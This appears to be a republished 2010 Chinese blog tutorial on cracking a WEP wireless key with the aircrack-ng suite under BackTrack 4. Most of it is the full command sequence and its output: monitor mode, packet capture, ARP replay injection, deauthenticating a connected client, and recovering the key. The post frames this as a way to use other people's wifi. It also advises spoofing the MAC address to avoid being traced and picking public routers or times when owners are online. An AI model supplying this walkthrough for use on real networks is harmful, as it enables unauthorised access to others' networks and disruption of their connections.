iCNPunk » Blog Archive » WEP Cracking through Intel(R) PRO 3945ABG

Posted by iCNPunk on 02月 8th, 2010

前段时间有同学问我关于蹭网的方法,我没亲身测试不敢说,今天我试验了一下,并且否定了网上某些关于笔记本集成网卡不能xx的说法。我的实验环境:

CPU: Intel(R) Core(TM)2 CPU? T5300
RAM: 2.00GB
NIC: Intel(R) PRO 3945ABG
OS: BackTrack 4 Final

xx过程:

1)制作U盘启动的BT4系统
网上方法很多,我也用的unetbootin制作方法,这里不赘述。

2)启动系统并查看驱动加载情况

root@bt:~#startx
root@bt:~#iwconfig

发现存在wlan0说明系统已经识别并加载了我的网卡

3)开始xx
首先要确定无线网卡没有启动,也就是ifconfig里面看不到wlan0或者其他网卡对应的Interface。
如果无线网卡已经启动则要先关掉它:

root@bt:~#ifconfig wlan0 down

如果害怕被人追查到可以修改mac地址,详情见:,我这里只是测试就不修改了。
修改你的无线网卡类型为Monitor Interface:
airmon-ng start (interface)

root@bt:~#airmon-ng start wlan0
Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 – [phy0]
(monitor mode enabled on mon0)

修改以后多了一个mon0的Interface,下面我们都使用mon0进行xx。查看可用的无线网络:
airodump-ng (interface)

root@bt:~#airodump-ng mon0

从里面查看到我的路由器BSSID为00:1B:11:89:D5:BA,频道为8,ESSID为suckme。
airodump-ng -c (channel) -w (file name) –bssid (bssid) (interface)

root@bt:~#airodump-ng -c 8 -w capturefile –bssid 00:1B:11:89:D5:BA mon0
CH 8 ][ Elapsed: 45 mins ][ 2010-02-08 02:40 ][ Broken SKA: 00:1B:11:89:D5:BA

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1B:11:89:D5:BA -90 100 26479 10078 0 8 54 . WEP WEP SKA suckme

BSSID STATION PWR Rate Lost Packets Probes

00:1B:11:89:D5:BA 00:1B:77:64:DE:A8 0 0 - 1 0 1215078
00:1B:11:89:D5:BA 00:26:08:1A:D2:F5 -57 1 -54 0 17436

从反馈出来的信息可以看到同时有两个连接到我的路由器00:1B:77:64:DE:A8和00:26:08:1A:D2:F5,前者是我的笔记本,后者是我的手机,这里要明白一个道理,这样xx是需要嗅探大量的数据包进行密码猜解,所以需要有别的主机登陆路由器并且进行网络通信。如果截取不到足够的数据包则不能进行密码猜解,这就是为什么很多人无法xx的重要原因。这些数据是我已经xx完成时记录下来的,可以看到#Data已经有10078个,也就是后面所说的IVs,在使用aircrack-ngxx不成功的时候他会提示你next try *****IVs,你只需要继续等待#Data达到足够数量就好。

重新开启一个SHELL测试一下我能否连接路由器:
aireplay-ng -1 0 -a (bssid) -h (your mac) -e (essid) (interface)

root@bt:~#aireplay-ng -0 1 -c 00:25:CF:02:79:93 -h 00:1B:77:64:DE:A8 -e suckme mon0

运行完以后就可以看到上面命令输出的内容里多了红色一行,说明可以连接。
如果你需要查看传送的包是否正确:
aireplay-ng -3 -b (bssid) -h (your mac) (interface)

root@bt:~#aireplay-ng -3 -b 00:1B:11:89:D5:BA -h 00:1B:77:64:DE:A8 mon0

幸运的话过一会刷屏会非常厉害。
然后我们就等待路由器主人上线,我用手机登陆路由器,登陆成功以后就可以看到刚才输出内容红色下面那一条信息,为了获得更多的登陆数据包,我还可以把主人的连接T掉:
aireplay-ng -0 1 –c (client mac) -h (your mac) –e (essid) (interface)

root@bt:~#aireplay-ng -0 1 -c 00:26:08:1A:D2:F5 -h 00:1B:77:64:DE:A8 -e suckme mon0

如果一次T不掉就多运行几次这条指令。
当你觉得airodump-ng窗口里面#Data足够多的时候就可以使用aircrack-ng进行xx了。窗口不用关,嗅探的同时进行xx即可:
aircrack-ng -b (bssid) (file-01.cap)

root@bt:~#aircrack-ng -b 00:1B:11:89:D5:BA capturefile-01.cap
Aircrack-ng 1.0 r1645

[00:00:29] Tested 33147 keys (got 10018 IVs)

KB depth byte(vote)
0 13/ 25 35(12800) AA(12800) 05(12544) 22(12544) 4C(12544)
1 0/ 1 38(16384) 2C(14080) 47(13824) 7C(13824) 0A(13312)
2 1/ 21 37(14592) E6(14336) 5E(14336) 38(14080) 66(14080)
3 6/ 11 09(13568) 78(13056) 98(13056) A7(13056) D6(13056)
4 1/ 6 33(14080) 2D(13312) 71(13312) B3(13312) C4(13312)

KEY FOUND! [ 35:38:37:32:33 ] (ASCII: 58723 )
Decrypted correctly: {bfb}

用时45分钟xx成功,58723就是我的无线网卡密码了。
至此,我想纠正大家几个误区:
1.待xx的路由器必须有人能够登陆,所以挑选一个公共路由器或者路由器主人使用网络的时间进行xx。
2.Backtrack不是一个工具,他是一个基于Ubuntu Linux强大的安全检测系统,它的作用也不仅仅只是xxWIFI密码,如果你不会使用Linux,你可以选择WIN$xx,Linux有一定的危险性,不推荐小白使用。
3.xx是对网卡有要求,但是好的网卡只是加快了xx的速度,不要太过于依赖网络上炒得很热的“卡皇”一类的网卡,假货很多而且并非{zh0}的,对于WIFIxx的网卡相关信息可以查看?(需要xx)。WEP加密的xx不需要太好的网卡,WPA的xx没有好一点的网卡你会很郁闷的。过一段时间我将测试WPA加密路由器的xx,等测试完我再来发话。
4.对于BT3里面使用的spoonwepxx工具我不推荐使用,它太过于傻瓜化,可调节性不强,不要放弃任何一个学习的机会。

Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Comment moderation is enabled. Your comment may take some time to appear.

Powered by

郑重声明:资讯 【iCNPunk » Blog Archive » WEP Cracking through Intel(R) PRO 3945ABG】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——